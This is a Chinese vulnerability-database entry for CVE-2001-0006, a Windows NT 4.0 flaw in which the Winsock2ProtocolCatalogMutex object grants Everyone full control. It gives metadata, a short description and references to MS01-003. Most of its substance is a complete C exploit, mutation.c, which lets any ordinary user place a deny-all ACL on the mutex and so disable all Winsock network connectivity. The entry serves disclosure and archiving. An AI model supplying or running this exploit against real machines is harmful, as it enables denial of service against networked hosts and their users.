Windows NT Winsock2ProtocolCatalogMutex mutex控制许可漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106185 漏洞类型 未知
发布时间 2001-01-24 更新时间 2005-10-12
CVE编号 CVE-2001-0006 CNNVD-ID CNNVD-200102-020
漏洞平台 Windows CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20596
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-020
|漏洞详情
WindowsNT4.0版本的Winsock2ProtocolCatalogMutexmutex具有inappropriateEveryone/Full控制许可。本地用户可以利用该漏洞修改对"NoAccess"的许可并使Winsock网络连接失效,也称为"WinsockMutex"漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/2303/info

Microsoft Windows NT 4.0 is subject to a denial of service due to the implementation of incorrect permissions in a Mutex object. A local user could gain control of the Mutex on a networked machine and deny all network communication. 

/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
	PSID pEveryoneSID;
	SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
	PACL pDacl;
	DWORD sizeNeeded;

	AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);
	sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(pEveryoneSID) - sizeof(DWORD);
	pDacl = (PACL) malloc(sizeNeeded);
	InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
	AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
	SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
	free(pDacl);
	return 0;
}
|参考资料

来源:MS
名称:MS01-003
链接:http://www.microsoft.com/technet/security/bulletin/MS01-003.asp
来源:BUGTRAQ
名称:20010126ntsecurity.nuadvisory:WinsockMutexVulnerabilityinWindowsNT4.0SP6andbelow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=98075221915234&w=2
来源:XF
名称:winnt-mutex-dos(6006)
链接:http://xforce.iss.net/xforce/xfdb/6006